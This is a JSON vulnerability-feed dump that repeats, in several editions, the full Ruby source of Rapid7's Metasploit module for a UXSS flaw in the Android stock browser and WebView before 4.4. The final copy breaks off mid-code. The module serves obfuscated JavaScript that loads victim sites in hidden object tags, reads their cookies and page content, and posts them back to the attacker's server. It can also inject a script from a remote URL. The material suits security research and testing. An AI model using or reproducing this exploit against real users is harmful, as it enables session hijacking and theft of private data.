"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-01T04:59:41", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-01T04:59:41", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-03T21:02:33", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-03T21:02:33", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-03T23:02:35", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-03T23:02:35", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-06T00:59:04", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-06T00:59:04", "differentElements": ["modified", "published"], "edition": 48}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-06T02:57:51", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-06T02:57:51", "differentElements": ["modified", "published"], "edition": 49}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-11T21:21:31", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
